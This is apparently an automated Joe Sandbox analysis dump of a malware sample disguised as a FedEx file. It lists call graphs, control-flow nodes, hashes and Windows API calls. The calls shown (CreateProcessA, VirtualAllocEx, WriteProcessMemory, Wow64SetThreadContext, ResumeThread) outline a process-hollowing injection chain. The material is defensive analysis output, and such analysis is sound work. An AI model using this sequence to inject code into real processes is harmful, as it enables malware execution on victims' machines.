28057->28056 28058->28056 28059->28056 28060->28056 28061->28056 28062->28056 28063->28056 28064->28056 28065->28056 28066->28056 28067->28056 28068->28056 28069->28056 28071 619f04d 28070->28071 28073 149052a 2 API calls 28071->28073 28074 149040d 2 API calls 28071->28074 28075 149036e 2 API calls 28071->28075 28076 1490a81 2 API calls 28071->28076 28077 1490040 2 API calls 28071->28077 28078 1490707 2 API calls 28071->28078 28079 1490006 2 API calls 28071->28079 28080 149031e 2 API calls 28071->28080 28081 1490571 2 API calls 28071->28081 28082 1490393 2 API calls 28071->28082 28083 1490ad5 2 API calls 28071->28083 28084 14901d7 2 API calls 28071->28084 28085 14902b7 2 API calls 28071->28085 28072 619f086 28072->28033 28073->28072 28074->28072 28075->28072 28076->28072 28077->28072 28078->28072 28079->28072 28080->28072 28081->28072 28082->28072 28083->28072 28084->28072 28085->28072 28149 619e058 28086->28149 28153 619e060 28086->28153 28087 14903f5 28087->28039 28157 1490f00 28090->28157 28162 1490f10 28090->28162 28091 14902cf 28096 149011a 28094->28096 28095 1490cab 28095->28039 28096->28039 28096->28095 28175 619e1f8 28096->28175 28179 619e1ec 28096->28179 28183 619df68 28099->28183 28187 619df70 28099->28187 28100 1490af9 28104 1490399 28103->28104 28191 619d8e8 28104->28191 28195 619d8f0 28104->28195 28105 14902ee 28105->28039 28109 14903aa 28108->28109 28110 14902ee 28109->28110 28111 619d8e8 ResumeThread 28109->28111 28112 619d8f0 ResumeThread 28109->28112 28110->28039 28111->28110 28112->28110 28114 14909ce 28113->28114 28199 619dea8 28114->28199 28205 619deb0 28114->28205 28115 14909ec 28120 1490026 28118->28120 28119 1490cab 28119->28039 28120->28039 28120->28119 28121 619e1f8 CreateProcessA 28120->28121 28122 619e1ec CreateProcessA 28120->28122 28121->28120 28122->28120 28124 149070d 28123->28124 28126 619df68 WriteProcessMemory 28124->28126 28127 619df70 WriteProcessMemory 28124->28127 28125 1490742 28126->28125 28127->28125 28129 1490073 28128->28129 28129->28039 28130 1490cab 28129->28130 28131 619e1f8 CreateProcessA 28129->28131 28132 619e1ec CreateProcessA 28129->28132 28130->28039 28131->28129 28132->28129 28134 149071e 28133->28134 28135 1490a95 28134->28135 28137 619df68 WriteProcessMemory 28134->28137 28138 619df70 WriteProcessMemory 28134->28138 28136 1490742 28137->28136 28138->28136 28140 1490a9b 28139->28140 28142 619d999 Wow64SetThreadContext 28140->28142 28143 619d9a0 Wow64SetThreadContext 28140->28143 28141 1490ab6 28142->28141 28143->28141 28145 1490430 28144->28145 28147 619df68 WriteProcessMemory 28145->28147 28148 619df70 WriteProcessMemory 28145->28148 28146 149086f 28147->28146 28148->28146 28150 619e060 ReadProcessMemory 28149->28150 28152 619e0ef 28150->28152 28152->28087 28154 619e0ab ReadProcessMemory 28153->28154 28156 619e0ef 28154->28156 28156->28087 28158 1490f10 28157->28158 28167 619d999 28158->28167 28171 619d9a0 28158->28171 28159 1490f3b 28159->28091 28163 1490f15 28162->28163 28165 619d999 Wow64SetThreadContext 28163->28165 28166 619d9a0 Wow64SetThreadContext 28163->28166 28164 1490f3b 28164->28091 28165->28164 28166->28164 28168 619d9a0 Wow64SetThreadContext 28167->28168 28170 619da2d 28168->28170 28170->28159 28172 619d9e5 Wow64SetThreadContext 28171->28172 28174 619da2d 28172->28174 28174->28159 28176 619e281 CreateProcessA 28175->28176 28178 619e443 28176->28178 28180 619e1f8 CreateProcessA 28179->28180 28182 619e443 28180->28182 28184 619df70 WriteProcessMemory 28183->28184 28186 619e00f 28184->28186 28186->28100 28188 619dfb8 WriteProcessMemory 28187->28188 28190 619e00f 28188->28190 28190->28100 28192 619d930 ResumeThread 28191->28192 28194 619d961 28192->28194 28194->28105 28196 619d930 ResumeThread 28195->28196 28198 619d961 28196->28198 28198->28105 28200 619def8 VirtualAllocEx 28199->28200 28201 619deae VirtualAllocEx 28199->28201 28203 619df2d 28200->28203 28201->28203 28203->28115 28206 619def0 VirtualAllocEx 28205->28206 28208 619df2d 28206->28208 28208->28115 28026 12cd6c1 28027 12cd684 DuplicateHandle 28026->28027 28029 12cd6ca 28026->28029 28028 12cd696 28027->28028

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 478 6194748-6194755 479 61947cc-61947cd 478->479 480 6194757-6194780 478->480 483 61947cf-61947eb 479->483 481 6194782 480->481 482 6194787-61947c7 480->482 481->482 484 61947c8 482->484 485 61947ed 483->485 486 61947f4-61947f5 483->486 484->483 485->484 485->486 487 6194acd-6194ad6 485->487 488 6194858-619486f 485->488 489 61947fa-61947fe 485->489 490 6194a9a-6194ab1 485->490 491 61948df-61948f2 485->491 492 6194a7f-6194a95 485->492 493 619483e-6194853 485->493 494 61949f0-6194a05 485->494 495 6194915-6194970 485->495 496 6194975-6194988 485->496 497 6194874-6194887 485->497 498 61948f7-6194910 485->498 499 6194ab6-6194ac8 485->499 500 61948a8-61948ac 485->500 501 6194a0a-6194a1c 485->501 502 619498d-61949eb call 6194240 485->502 503 619488c-61948a3 485->503 504 6194a2f-6194a37 call 6193f10 485->504 505 619482e-619483c 485->505 506 6194a21-6194a2a 485->506 486->487 488->483 508 6194811-6194818 489->508 509 6194800-619480f 489->509 490->483 491->483 492->483 493->483 494->483 495->483 496->483 497->483 498->483 499->483 511 61948bf-61948c6 500->511 512 61948ae-61948bd 500->512 501->483 502->483 503->483 515 6194a3c-6194a55 504->515 505->483 506->483 514 619481f-619482c 508->514 509->514 517 61948cd-61948da 511->517 512->517 514->483 519 6194a5f-6194a7a 515->519 517->483 519->483
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID: UJ$yO6
                  • API String ID: 0-870398751
                  • Opcode ID: 375d1ca830debc8fed103e7e6c0441ebd8a08b9f365e54c3a53169bb6232fc4e
                  • Instruction ID: f87d123b5a816176a738b5895b52fcda0bc3579730921eca45dc486104df5f99
                  • Opcode Fuzzy Hash: 375d1ca830debc8fed103e7e6c0441ebd8a08b9f365e54c3a53169bb6232fc4e
                  • Instruction Fuzzy Hash: 18B13470D14219DFDF58CFA6D9805AEFBF2BF8A300F14992AD015AB264DB3499068F54

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 524 6194758-6194780 525 6194782 524->525 526 6194787-61947c7 524->526 525->526 527 61947c8 526->527 528 61947cf-61947eb 527->528 529 61947ed 528->529 530 61947f4-61947f5 528->530 529->527 529->530 531 6194acd-6194ad6 529->531 532 6194858-619486f 529->532 533 61947fa-61947fe 529->533 534 6194a9a-6194ab1 529->534 535 61948df-61948f2 529->535 536 6194a7f-6194a95 529->536 537 619483e-6194853 529->537 538 61949f0-6194a05 529->538 539 6194915-6194970 529->539 540 6194975-6194988 529->540 541 6194874-6194887 529->541 542 61948f7-6194910 529->542 543 6194ab6-6194ac8 529->543 544 61948a8-61948ac 529->544 545 6194a0a-6194a1c 529->545 546 619498d-61949eb call 6194240 529->546 547 619488c-61948a3 529->547 548 6194a2f-6194a55 call 6193f10 529->548 549 619482e-619483c 529->549 550 6194a21-6194a2a 529->550 530->531 532->528 552 6194811-6194818 533->552 553 6194800-619480f 533->553 534->528 535->528 536->528 537->528 538->528 539->528 540->528 541->528 542->528 543->528 555 61948bf-61948c6 544->555 556 61948ae-61948bd 544->556 545->528 546->528 547->528 563 6194a5f-6194a7a 548->563 549->528 550->528 558 619481f-619482c 552->558 553->558 561 61948cd-61948da 555->561 556->561 558->528 561->528 563->528
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID: UJ$yO6
                  • API String ID: 0-870398751
                  • Opcode ID: 25b3297ac13986e49ce5e1dfbc539bc604a473fb1d5d14cd82bfafce2391c8d8
                  • Instruction ID: b01e6a2faeb0f09ed8765e45998138baed86bcc6d7dcfd0c32c34e10f939562e
                  • Opcode Fuzzy Hash: 25b3297ac13986e49ce5e1dfbc539bc604a473fb1d5d14cd82bfafce2391c8d8
                  • Instruction Fuzzy Hash: 52B11370E1421DDFDF58CFA6D98059EFBF2BF89300F24992AD019AB264DB3499068F54

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 568 6193be8-6193c1d 570 6193c1f 568->570 571 6193c24-6193c55 568->571 570->571 572 6193c56 571->572 573 6193c5d-6193c79 572->573 574 6193c7b 573->574 575 6193c82-6193c83 573->575 574->572 574->575 576 6193e1a-6193e2c 574->576 577 6193c9d-6193cb4 574->577 578 6193dbe-6193dcc 574->578 579 6193e31-6193e43 574->579 580 6193dd1-6193de9 574->580 581 6193d73-6193d76 574->581 582 6193cf5-6193cf9 574->582 583 6193cb6-6193cc9 574->583 584 6193c88-6193c9b 574->584 585 6193e48-6193e5b 574->585 586 6193d2c-6193d6e 574->586 587 6193e8c-6193ea2 574->587 588 6193dee-6193e15 574->588 589 6193e60 574->589 590 6193da4-6193db9 574->590 591 6193ea7-6193eb0 574->591 575->591 576->573 577->573 578->573 579->573 580->573 608 6193d79 call 6194079 581->608 609 6193d79 call 61928bc 581->609 594 6193cfb-6193d0a 582->594 595 6193d0c-6193d13 582->595 592 6193ccb-6193cda 583->592 593 6193cdc-6193ce3 583->593 584->573 585->573 586->573 587->573 588->573 603 6193e63 call 6192878 589->603 604 6193e63 call 6193f48 589->604 605 6193e63 call 6193f90 589->605 606 6193e63 call 6193f03 589->606 607 6193e63 call 6192884 589->607 590->573 597 6193cea-6193cf0 592->597 593->597 599 6193d1a-6193d27 594->599 595->599 596 6193d7f-6193d9f 596->573 597->573 599->573 601 6193e69-6193e87 601->573 603->601 604->601 605->601 606->601 607->601 608->596 609->596
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID: !>c8$%)Y
                  • API String ID: 0-2922296349
                  • Opcode ID: c373e8dd06b0d5a20fd81ad75d82b30144e75ae7bbf990ce33e59d044c61b10a
                  • Instruction ID: e70f4bf15e0fb19939e7e2108471f4559905008f7b28ee38c9944a36094b9edb
                  • Opcode Fuzzy Hash: c373e8dd06b0d5a20fd81ad75d82b30144e75ae7bbf990ce33e59d044c61b10a
                  • Instruction Fuzzy Hash: 49815771D19619EFCF48CFA6E58049EFBB2FF89300F10942AE029AB264D7308942CF50

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 610 6193bf8-6193c1d 611 6193c1f 610->611 612 6193c24-6193c55 610->612 611->612 613 6193c56 612->613 614 6193c5d-6193c79 613->614 615 6193c7b 614->615 616 6193c82-6193c83 614->616 615->613 615->616 617 6193e1a-6193e2c 615->617 618 6193c9d-6193cb4 615->618 619 6193dbe-6193dcc 615->619 620 6193e31-6193e43 615->620 621 6193dd1-6193de9 615->621 622 6193d73-6193d76 615->622 623 6193cf5-6193cf9 615->623 624 6193cb6-6193cc9 615->624 625 6193c88-6193c9b 615->625 626 6193e48-6193e5b 615->626 627 6193d2c-6193d6e 615->627 628 6193e8c-6193ea2 615->628 629 6193dee-6193e15 615->629 630 6193e60 615->630 631 6193da4-6193db9 615->631 632 6193ea7-6193eb0 615->632 616->632 617->614 618->614 619->614 620->614 621->614 649 6193d79 call 6194079 622->649 650 6193d79 call 61928bc 622->650 635 6193cfb-6193d0a 623->635 636 6193d0c-6193d13 623->636 633 6193ccb-6193cda 624->633 634 6193cdc-6193ce3 624->634 625->614 626->614 627->614 628->614 629->614 644 6193e63 call 6192878 630->644 645 6193e63 call 6193f48 630->645 646 6193e63 call 6193f90 630->646 647 6193e63 call 6193f03 630->647 648 6193e63 call 6192884 630->648 631->614 638 6193cea-6193cf0 633->638 634->638 640 6193d1a-6193d27 635->640 636->640 637 6193d7f-6193d9f 637->614 638->614 640->614 642 6193e69-6193e87 642->614 644->642 645->642 646->642 647->642 648->642 649->637 650->637
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID: !>c8$%)Y
                  • API String ID: 0-2922296349
                  • Opcode ID: 59c22396e80252b75e86124f37ef0c7651fa216ce16f31cc4ff885f046e29c8d
                  • Instruction ID: a10a7cccb0d78a54174f26403fae04d49f85fc216060162dadb9440529f58c44
                  • Opcode Fuzzy Hash: 59c22396e80252b75e86124f37ef0c7651fa216ce16f31cc4ff885f046e29c8d
                  • Instruction Fuzzy Hash: 49814770D14619EFDF48CFA6E58459EFBB2FF89310F10942AE429AB264D7309942CF50
                  Memory Dump Source
                  • Source File: 00000000.00000002.1218048613.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1490000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e0b5f44aa39098f28aa297dfc77d938f020d6606c29c9e834a69f48886c54e5e
                  • Instruction ID: 065a57469f40bb9b29a0165cdc0e1de1627328feef8c08788d520b00641edbba
                  • Opcode Fuzzy Hash: e0b5f44aa39098f28aa297dfc77d938f020d6606c29c9e834a69f48886c54e5e
                  • Instruction Fuzzy Hash: DB71F7B1D05229CBDB68CF66C8417E9BBBABF89300F10C1EAD50DA7251EB705A85CF40
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 660d7274490bcae25cc5d6db1a6c00714bef6ee1a3ba96241870c63b3b45575f
                  • Instruction ID: 5f234a39d66c05a12c0ca9cacc5f9944b8b05c164f488339bdea5106ba6f7f2d
                  • Opcode Fuzzy Hash: 660d7274490bcae25cc5d6db1a6c00714bef6ee1a3ba96241870c63b3b45575f
                  • Instruction Fuzzy Hash: BA31DBB0D056188FEB58CFA7C9543EEFFF6AFCA300F18C46AD009A6255DB7409458B60
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5c2d0199f97a509cb6da558ed864f217a87bece1f0a86a49c0f24cfdcb81778a
                  • Instruction ID: 1e43e10699c6c558b7c1888de861f820abf98aec33ee93b8756ca72baa6fbacb
                  • Opcode Fuzzy Hash: 5c2d0199f97a509cb6da558ed864f217a87bece1f0a86a49c0f24cfdcb81778a
                  • Instruction Fuzzy Hash: 0721C6B0D146189BEB58CF9BC9453EEFAFBAFC9300F18C46AD40966254DB7409458FA1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 341 12cd3a8-12cd447 GetCurrentProcess 345 12cd449-12cd44f 341->345 346 12cd450-12cd484 GetCurrentThread 341->346 345->346 347 12cd48d-12cd4c1 GetCurrentProcess 346->347 348 12cd486-12cd48c 346->348 350 12cd4ca-12cd4e5 call 12cd589 347->350 351 12cd4c3-12cd4c9 347->351 348->347 354 12cd4eb-12cd51a GetCurrentThreadId 350->354 351->350 355 12cd51c-12cd522 354->355 356 12cd523-12cd585 354->356 355->356
                  APIs
                  • GetCurrentProcess.KERNEL32 ref: 012CD436
                  • GetCurrentThread.KERNEL32 ref: 012CD473
                  • GetCurrentProcess.KERNEL32 ref: 012CD4B0
                  • GetCurrentThreadId.KERNEL32 ref: 012CD509
                  Memory Dump Source
                  • Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: Current$ProcessThread
                  • String ID:
                  • API String ID: 2063062207-0
                  • Opcode ID: d48df3af724b946370370845706a61a2cb6e82d1b82e27bad240ccb1701755ee
                  • Instruction ID: f84bdc350403ea4ea7a17139ab024fdab120a5b2231853d6a0404a05a99d0778
                  • Opcode Fuzzy Hash: d48df3af724b946370370845706a61a2cb6e82d1b82e27bad240ccb1701755ee
                  • Instruction Fuzzy Hash: BC5167B090134A8FEB14DFA9D5487DEBBF1FF48304F248169D119A73A0D7386945CB65

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 363 12cd3b8-12cd447 GetCurrentProcess 367 12cd449-12cd44f 363->367 368 12cd450-12cd484 GetCurrentThread 363->368 367->368 369 12cd48d-12cd4c1 GetCurrentProcess 368->369 370 12cd486-12cd48c 368->370 372 12cd4ca-12cd4e5 call 12cd589 369->372 373 12cd4c3-12cd4c9 369->373 370->369 376 12cd4eb-12cd51a GetCurrentThreadId 372->376 373->372 377 12cd51c-12cd522 376->377 378 12cd523-12cd585 376->378 377->378
                  APIs
                  • GetCurrentProcess.KERNEL32 ref: 012CD436
                  • GetCurrentThread.KERNEL32 ref: 012CD473
                  • GetCurrentProcess.KERNEL32 ref: 012CD4B0
                  • GetCurrentThreadId.KERNEL32 ref: 012CD509
                  Memory Dump Source
                  • Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: Current$ProcessThread
                  • String ID:
                  • API String ID: 2063062207-0
                  • Opcode ID: 6fe82ac54f7df4146e3f8e967fdd697a096bbd16fa9d8158106238b17b13b8fe
                  • Instruction ID: 8083b51fae5379f5f52cd6b89815e54fe826575e3150828d2c799680adca6a69
                  • Opcode Fuzzy Hash: 6fe82ac54f7df4146e3f8e967fdd697a096bbd16fa9d8158106238b17b13b8fe
                  • Instruction Fuzzy Hash: 715155B090130A8FEB14DFAAD548BDEBBF1FF48314F208169D119A72A0DB34A945CF65

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 786 619e1ec-619e28d 789 619e28f-619e299 786->789 790 619e2c6-619e2e6 786->790 789->790 791 619e29b-619e29d 789->791 797 619e2e8-619e2f2 790->797 798 619e31f-619e34e 790->798 792 619e29f-619e2a9 791->792 793 619e2c0-619e2c3 791->793 795 619e2ab 792->795 796 619e2ad-619e2bc 792->796 793->790 795->796 796->796 799 619e2be 796->799 797->798 800 619e2f4-619e2f6 797->800 804 619e350-619e35a 798->804 805 619e387-619e441 CreateProcessA 798->805 799->793 802 619e319-619e31c 800->802 803 619e2f8-619e302 800->803 802->798 806 619e304 803->806 807 619e306-619e315 803->807 804->805 808 619e35c-619e35e 804->808 818 619e44a-619e4d0 805->818 819 619e443-619e449 805->819 806->807 807->807 809 619e317 807->809 810 619e381-619e384 808->810 811 619e360-619e36a 808->811 809->802 810->805 813 619e36c 811->813 814 619e36e-619e37d 811->814 813->814 814->814 815 619e37f 814->815 815->810 829 619e4e0-619e4e4 818->829 830 619e4d2-619e4d6 818->830 819->818 832 619e4f4-619e4f8 829->832 833 619e4e6-619e4ea 829->833 830->829 831 619e4d8 830->831 831->829 834 619e508-619e50c 832->834 835 619e4fa-619e4fe 832->835 833->832 836 619e4ec 833->836 838 619e51e-619e525 834->838 839 619e50e-619e514 834->839 835->834 837 619e500 835->837 836->832 837->834 840 619e53c 838->840 841 619e527-619e536 838->841 839->838 843 619e53d 840->843 841->840 843->843
                  APIs
                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0619E42E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: CreateProcess
                  • String ID:
                  • API String ID: 963392458-0
                  • Opcode ID: 6e793b28dfdb67b47c90a75fc51dad2ebaf613d98091b97ce310343ebc684911
                  • Instruction ID: d36e7aca2e0f32e9b4d126b94232b6e9be36e97ed0a3c1443ba21424dd56c177
                  • Opcode Fuzzy Hash: 6e793b28dfdb67b47c90a75fc51dad2ebaf613d98091b97ce310343ebc684911
                  • Instruction Fuzzy Hash: 09A15C71D007198FEF64DF69C841BEDBBB2BF44314F1485A9E808A7280DB759A85CFA1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 844 619e1f8-619e28d 846 619e28f-619e299 844->846 847 619e2c6-619e2e6 844->847 846->847 848 619e29b-619e29d 846->848 854 619e2e8-619e2f2 847->854 855 619e31f-619e34e 847->855 849 619e29f-619e2a9 848->849 850 619e2c0-619e2c3 848->850 852 619e2ab 849->852 853 619e2ad-619e2bc 849->853 850->847 852->853 853->853 856 619e2be 853->856 854->855 857 619e2f4-619e2f6 854->857 861 619e350-619e35a 855->861 862 619e387-619e441 CreateProcessA 855->862 856->850 859 619e319-619e31c 857->859 860 619e2f8-619e302 857->860 859->855 863 619e304 860->863 864 619e306-619e315 860->864 861->862 865 619e35c-619e35e 861->865 875 619e44a-619e4d0 862->875 876 619e443-619e449 862->876 863->864 864->864 866 619e317 864->866 867 619e381-619e384 865->867 868 619e360-619e36a 865->868 866->859 867->862 870 619e36c 868->870 871 619e36e-619e37d 868->871 870->871 871->871 872 619e37f 871->872 872->867 886 619e4e0-619e4e4 875->886 887 619e4d2-619e4d6 875->887 876->875 889 619e4f4-619e4f8 886->889 890 619e4e6-619e4ea 886->890 887->886 888 619e4d8 887->888 888->886 891 619e508-619e50c 889->891 892 619e4fa-619e4fe 889->892 890->889 893 619e4ec 890->893 895 619e51e-619e525 891->895 896 619e50e-619e514 891->896 892->891 894 619e500 892->894 893->889 894->891 897 619e53c 895->897 898 619e527-619e536 895->898 896->895 900 619e53d 897->900 898->897 900->900
                  APIs
                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0619E42E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: CreateProcess
                  • String ID:
                  • API String ID: 963392458-0
                  • Opcode ID: da8081898953d82e4b3a598911dddf2dd000af3824e08b2c6dbfdf7991132c88
                  • Instruction ID: 14d640386f3171c495309fad9342a088ca743c42cb3d1eb4bdc69af91866477e
                  • Opcode Fuzzy Hash: da8081898953d82e4b3a598911dddf2dd000af3824e08b2c6dbfdf7991132c88
                  • Instruction Fuzzy Hash: AF915C71D007198FEF64DF69C841BEDBBB2BF48314F148569E808A7250DB749A85CFA1
                  APIs
                  • GetModuleHandleW.KERNELBASE(00000000), ref: 012CAF7E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: HandleModule
                  • String ID:
                  • API String ID: 4139908857-0
                  • Opcode ID: 7c3572cd816644283bc88a8e89df67d214cfe9725334d5d01e637c3ce5a1c989
                  • Instruction ID: 7a26df87cb51f636432fa95f2df7fb2ba61265231caccbb6823369ef2779eed8
                  • Opcode Fuzzy Hash: 7c3572cd816644283bc88a8e89df67d214cfe9725334d5d01e637c3ce5a1c989
                  • Instruction Fuzzy Hash: 48712470A10B0A8FE725DF29D44075ABBF1FF88604F008A2DD68AD7A50E775E945CF91
                  APIs
                  • CreateActCtxA.KERNEL32(?), ref: 012C59A9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: Create
                  • String ID:
                  • API String ID: 2289755597-0
                  • Opcode ID: 1c864faa087d9eb871794db74d67417997176eb024fee71b82f4712e000b6963
                  • Instruction ID: 27a46610e2a729b99dee663e582e33f8282643f86191c7816528c8308bd15df0
                  • Opcode Fuzzy Hash: 1c864faa087d9eb871794db74d67417997176eb024fee71b82f4712e000b6963
                  • Instruction Fuzzy Hash: B5512071D1071ACFEB24CFAAC84478EBBF1BF49314F20816AD218AB251D775A946CF90
                  APIs
                  • CreateActCtxA.KERNEL32(?), ref: 012C59A9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: Create
                  • String ID:
                  • API String ID: 2289755597-0
                  • Opcode ID: e47f2c69c4eb825b9eed3acee4e4641dba6d708ad2ad2b98d3a0936fca110d40
                  • Instruction ID: 812a1748883893bd294e4e61c75026d39599965d38f54a1dea305149d007dcde
                  • Opcode Fuzzy Hash: e47f2c69c4eb825b9eed3acee4e4641dba6d708ad2ad2b98d3a0936fca110d40
                  • Instruction Fuzzy Hash: BA410270D1071DCBEB24DFAAC844B8EBBF1BF49704F20816AD518AB251DB756946CF90
                  APIs
                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012CD687
                  Memory Dump Source
                  • Source File: 00000000.00000002.1217543456.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_12c0000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: DuplicateHandle
                  • String ID:
                  • API String ID: 3793708945-0
                  • Opcode ID: 1a868dc2e5597c75c4fa83f525bd107c2d28d5e5ae26cb1c02ad01f694ac8bc6
                  • Instruction ID: 12f18e59a6ed3e441fddbd84ccedb1fbbf1659186d72872a10173cba967b22ce
                  • Opcode Fuzzy Hash: 1a868dc2e5597c75c4fa83f525bd107c2d28d5e5ae26cb1c02ad01f694ac8bc6
                  • Instruction Fuzzy Hash: 3931A234641380CFE314EF66E4847293BA6F784710FA1917AEA169B3D8DBBC4949CF11
                  APIs
                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0619E000
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: MemoryProcessWrite
                  • String ID:
                  • API String ID: 3559483778-0
                  • Opcode ID: c167f9813fd2d074226b773338e9e7f76447000eb591e526b4229fc13c524221
                  • Instruction ID: b69f849557d5c41f1d84d43953bc32d89bbcb37967bf371c9807f9b314aa1ec5
                  • Opcode Fuzzy Hash: c167f9813fd2d074226b773338e9e7f76447000eb591e526b4229fc13c524221
                  • Instruction Fuzzy Hash: 8B213771D003499FDB20CFA9C881BDEBBF5FF48310F54892AE958A7241CB799944CBA4
                  APIs
                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0619E000
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: MemoryProcessWrite
                  • String ID:
                  • API String ID: 3559483778-0
                  • Opcode ID: 1fcae5f058f432e9c8d3027b4a29338136e894849c93a9703bccf3dc46f3e269
                  • Instruction ID: fede1bdf5dacd3c20452e3313d8a5d5a3b8befa58e1d413dfa559cec59997234
                  • Opcode Fuzzy Hash: 1fcae5f058f432e9c8d3027b4a29338136e894849c93a9703bccf3dc46f3e269
                  • Instruction Fuzzy Hash: 0B211371D003099FDB20DFAAC885BDEBBF5FF48310F54842AE958A7240CB799941CBA4
                  APIs
                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0619DA1E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1220296677.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_6190000_FedEx_776282383902.jbxd
                  Similarity
                  • API ID: ContextThreadWow64
                  • String ID:
                  • API String ID: 983334009-0
                  • Opcode ID: e5231babec444daa2a71410e2d7a99f69ca9487b89f208644324ed41490719b7
                  • Instruction ID: 03d2cea23cf22acf8b7bc7f9f64940aee0922d6fcfb83378ad4d63b9efeb4ef3
                  • Opcode Fuzzy Hash: e5231babec444daa2a71410e2d7a99f69ca9487b89f208644324ed41490719b7
